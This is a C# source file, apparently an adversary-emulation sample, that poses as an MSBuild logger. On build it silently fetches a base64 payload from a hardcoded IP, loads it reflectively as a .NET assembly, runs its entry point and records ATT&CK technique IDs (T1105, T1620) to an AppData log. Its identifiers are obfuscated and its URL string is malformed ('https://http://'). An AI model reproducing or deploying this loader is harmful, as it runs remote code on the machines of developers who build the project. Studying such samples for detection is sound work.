using System;
using System.Reflection;
using System.Net;
using System.IO;
using Microsoft.Build.Framework;
using System.Text;

public class nvytqefy : ILogger
{
    const string qwmkt = "10";
    const string uqegji = "http://100.111.22.117:8000";
    const string wxhmi = "1076";
    const string svtlfyl = "https://http://100.111.22.117:8000/stage/1076/3?endpoint_id=10";
    const string dyaqoqi = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    
    public void Initialize(IEventSource kjhdx)
    {
        gdfloaw();
    }
    
    private void gdfloaw()
    {
        byte[] lyhoy = null;
        try
        {
            lyhoy = bfkjwob();
            if (lyhoy != null && lyhoy.Length > 0)
            {
                uvjehd(lyhoy);
            }
        }
        catch { }
    }
    
    private byte[] bfkjwob()
    {
        byte[] wuaeft = null;
        try
        {
            using (WebClient ivhdbr = new WebClient())
            {
                ivhdbr.Headers["User-Agent"] = dyaqoqi;
                ivhdbr.Headers.Add("X-ID", qwmkt + "-" + wxhmi);
                string fzvmh = ivhdbr.DownloadString(uqegji + svtlfyl);
                wuaeft = Convert.FromBase64String(fzvmh);
                krngwdo("T1105", 1);
            }
        }
        catch
        {
            krngwdo("T1105", 0);
        }
        return wuaeft;
    }
    
    private void uvjehd(byte[] rhfwd)
    {
        try
        {
            Assembly fnvaxud = Assembly.Load(rhfwd);
            MethodInfo asjbm = fnvaxud.EntryPoint;
            if (asjbm != null)
            {
                object erqft = fnvaxud.CreateInstance(asjbm.Name);
                asjbm.Invoke(erqft, new object[] { new string[0] });
                krngwdo("T1620", 1);
            }
            else
            {
                krngwdo("T1620", 0);
            }
        }
        catch
        {
            krngwdo("T1620", 0);
        }
    }
    
    private void krngwdo(string hfdfsq, int bmluw)
    {
        try
        {
            string ioxqh = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string iqfxfjw = Path.Combine(ioxqh, wxhmi);
            
            if (!Directory.Exists(iqfxfjw))
                Directory.CreateDirectory(iqfxfjw);
                
            string prxje = Path.Combine(iqfxfjw, $"{DateTime.Now:yyyyMMddHHmmss}-Log.txt");
            string ghbpwm = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}][Stage 2 Loader-DLL Universal NET]: {qwmkt}-{wxhmi}-{hfdfsq}={bmluw}";
            
            File.AppendAllText(prxje, ghbpwm + Environment.NewLine);
        }
        catch { }
    }
    
    public void Shutdown() { }
    public string Parameters { get; set; }
    public LoggerVerbosity Verbosity { get; set; }
}